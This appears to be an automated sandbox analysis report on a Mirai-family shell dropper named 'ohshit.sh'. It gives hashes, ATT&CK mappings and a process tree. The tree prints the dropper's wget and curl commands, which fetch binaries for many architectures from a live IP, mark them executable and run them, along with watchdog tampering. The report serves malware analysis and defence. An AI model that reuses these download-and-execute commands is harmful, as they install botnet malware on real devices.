Analysis
-
max time kernel
148s -
max time network
159s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-12-2024 02:25
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
8cadf8766bc5de0f7f7df9bf000cd0aa
-
SHA1
fa6c2f9c7a20a3c1c6831d859d4b809aadf49567
-
SHA256
c2688b90a1a2a5833e5ae2615d293da746c03c300413e39a14ff40ecc332c7f1
-
SHA512
8859f146c24023b97e34f53eda375ce9a0df64037806c86271d00a596a37097afbb7cfa4ffe1df2d58b4ed252fb048277ae8c3fc304be1551a33541390c8bac2
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 774 chmod 794 chmod 813 chmod 849 chmod 860 chmod 800 chmod 828 chmod 843 chmod 854 chmod 684 chmod 706 chmod 731 chmod 747 chmod 789 chmod 818 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Chaotic 685 Chaotic /tmp/Chaotic 707 Chaotic /tmp/Chaotic 732 Chaotic /tmp/Chaotic 748 Chaotic /tmp/Chaotic 776 Chaotic /tmp/Chaotic 790 Chaotic /tmp/Chaotic 795 Chaotic /tmp/Chaotic 801 Chaotic /tmp/Chaotic 814 Chaotic /tmp/Chaotic 819 Chaotic /tmp/Chaotic 829 Chaotic /tmp/Chaotic 844 Chaotic /tmp/Chaotic 850 Chaotic /tmp/Chaotic 855 Chaotic /tmp/Chaotic 861 Chaotic -
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 6 IoCs
description ioc Process File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic -
resource yara_rule behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/19/status Chaotic File opened for reading /proc/27/status Chaotic File opened for reading /proc/42/status Chaotic File opened for reading /proc/805/status Chaotic File opened for reading /proc/11/status Chaotic File opened for reading /proc/601/status Chaotic File opened for reading /proc/17/status Chaotic File opened for reading /proc/76/status Chaotic File opened for reading /proc/20/status Chaotic File opened for reading /proc/139/status Chaotic File opened for reading /proc/filesystems cp File opened for reading /proc/43/status Chaotic File opened for reading /proc/21/status Chaotic File opened for reading /proc/14/status Chaotic File opened for reading /proc/1/status Chaotic File opened for reading /proc/16/status Chaotic File opened for reading /proc/16/status Chaotic File opened for reading /proc/23/status Chaotic File opened for reading /proc/604/status Chaotic File opened for reading /proc/604/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/17/status Chaotic File opened for reading /proc/21/status Chaotic File opened for reading /proc/22/status Chaotic File opened for reading /proc/604/status Chaotic File opened for reading /proc/16/status Chaotic File opened for reading /proc/41/status Chaotic File opened for reading /proc/9/status Chaotic File opened for reading /proc/599/status Chaotic File opened for reading /proc/self/auxv curl File opened for reading /proc/21/status Chaotic File opened for reading /proc/22/status Chaotic File opened for reading /proc/317/status Chaotic File opened for reading /proc/822/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/654/status Chaotic File opened for reading /proc/self/auxv curl File opened for reading /proc/14/status Chaotic File opened for reading /proc/76/status Chaotic File opened for reading /proc/106/status Chaotic File opened for reading /proc/269/status Chaotic File opened for reading /proc/317/status Chaotic File opened for reading /proc/2/status Chaotic File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/317/status Chaotic File opened for reading /proc/5/status Chaotic File opened for reading /proc/26/status Chaotic File opened for reading /proc/149/status Chaotic File opened for reading /proc/28/status Chaotic File opened for reading /proc/149/status Chaotic File opened for reading /proc/169/status Chaotic File opened for reading /proc/316/status Chaotic File opened for reading /proc/7/status Chaotic File opened for reading /proc/801/status Chaotic File opened for reading /proc/1/status Chaotic File opened for reading /proc/43/status Chaotic File opened for reading /proc/316/status Chaotic File opened for reading /proc/603/status Chaotic File opened for reading /proc/10/status Chaotic File opened for reading /proc/216/status Chaotic File opened for reading /proc/11/status Chaotic File opened for reading /proc/583/status Chaotic -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 761 curl 772 cat 778 wget 785 curl 788 cat 750 wget -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sparc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc wget File opened for modification /tmp/busybox cp File opened for modification /tmp/Chaotic ohshit.sh File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm5 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm6 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm7 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mips64 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.arm curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.mpsl wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.ppc curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.sh4 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.x86_64 wget File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.i686 curl File opened for modification /tmp/ub8ehJSePAfc9FYqZIT6.m68k wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:651 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:653
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Writes file to tmp directory
PID:659
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:679
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arc2⤵PID:682
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:685
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x862⤵
- Writes file to tmp directory
PID:687
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:695
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x862⤵PID:704
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x862⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:707
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Writes file to tmp directory
PID:709
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_642⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:718
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.x86_642⤵PID:728
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:732
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Writes file to tmp directory
PID:736
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.i6862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:745
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.i6862⤵PID:746
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:748
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:761
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips2⤵
- System Network Configuration Discovery
PID:772
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:776
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:778
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips642⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:785
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mips642⤵
- System Network Configuration Discovery
PID:788
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:790
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Writes file to tmp directory
PID:791
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.mpsl2⤵PID:793
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:795
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Writes file to tmp directory
PID:797
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:798
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm2⤵PID:799
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:801
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Writes file to tmp directory
PID:810
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:811
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm52⤵PID:812
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:814
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm62⤵PID:817
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:819
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Writes file to tmp directory
PID:825
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.arm72⤵PID:827
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-lWtkC0 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:829
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Writes file to tmp directory
PID:840
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:841
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.ppc2⤵PID:842
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:844
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:846
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sparc2⤵PID:848
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:850
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Writes file to tmp directory
PID:851
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:852
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.m68k2⤵PID:853
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:855
-
-
/usr/bin/wgetwget http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Writes file to tmp directory
PID:857
-
-
/usr/bin/curlcurl -O http://195.26.252.19/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/catcat ub8ehJSePAfc9FYqZIT6.sh42⤵PID:859
-
-
/bin/chmodchmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_642⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:861
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5fc32f8a67d1b0590d25d38c2614d72d9
SHA1be2059efd5d4fcd999672caa7970019eb160bf13
SHA2561bd4414e839b5d0be6d814d0d3daae5f64df063fb87865d32fbe815e02d587fa
SHA512b99e74e7b031a5f21b1fece80c6976718a33efb3da3c13949fa8053f1e47970f335766a4376f33edff2dfaf79b144669ef28387dc73e9ff34cb77c94b47b9047
-
Filesize
36KB
MD52bd66161d02afa8b3891285f7f9cbfdf
SHA12ca808e492bf74c2cb8576f72212d3a88a7bd0af
SHA25621d663bd5974d560e377afd55d4ebaa86f82427db24b9f888197d1461bba80d1
SHA5128ded171bb4c03ec978b32048f088f167bc7433192befadb074c6cde71e67be934c9878bd5a1c4b42e5bcfac5682f93882df65ac9cfbcf633e8b450b11bda2574
-
Filesize
37KB
MD55a0517d1fa30a6fab030e281d2957328
SHA14abefe8b469f8e7efebb4756ea5d0963cff00161
SHA256e9b0591495af8c41cc5d6bb3dc368fc2df912322fd62be36c378f1b854764290
SHA512f387c8c2e996ba98b9a100c260959d3454f75d4580e5862209c7e2338b3a6fb15213191681536912b45cac0c05427c925040f3bf64bc224a75eb12721ca760bc
-
Filesize
43KB
MD550bf10e8cdfe9739c0cf974778e0bda1
SHA1212c2d9325b1c4a04ab78073f9094ff0010d3e6e
SHA256b105e2e16e62e0156c93ec6adb3786aac39387b326c151bd4740e705a7ab99e4
SHA5123db5b2334a7c5d966ed36c4ea61c31e5938e07aae63ece079ac421f60e83caca5ab3f4ec73279378cc95b2dc7e214912c2caeb42426c4cd00a4d9ebc28c65c74
-
Filesize
95KB
MD515ad8070f1389c13cc3414691809e9cb
SHA16a54eb1416971a44f79c14dc1a04b63526b5f7a4
SHA2567652dc3a15297526f43d44410b50e201ae335b89812a659a98e81b380ca7a391
SHA5126f2879dcec63810a200b28709ff927f5622038fd39b2973fc594d04c4190715344b48b47137bf6b5a4b215a6b96fc5ffbe4bf98c7fd438984e8c0002cc81fd53
-
Filesize
507KB
MD5e588bcf03ae78237b58899d35f50c570
SHA12194732ebbefbc27bdae876c77f2a97a20175710
SHA2562dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555
-
Filesize
113KB
MD567866b2fa89306af228090376b5ee71d
SHA1589a43771d9ced3e2c57b0f81b68d5c1870979b6
SHA25611ccfcb325127d662796d16aaf51a64ca1525239bee5b18591a7cca45a3c5fd5
SHA5127f67170a16b0f499a507c79d4ec70a4aaf2bc5de3b863440418b73203aff80bb3c4b3283b9601f30262c5cf197be86fbf473957b9f004ac9c815c7519bce72e4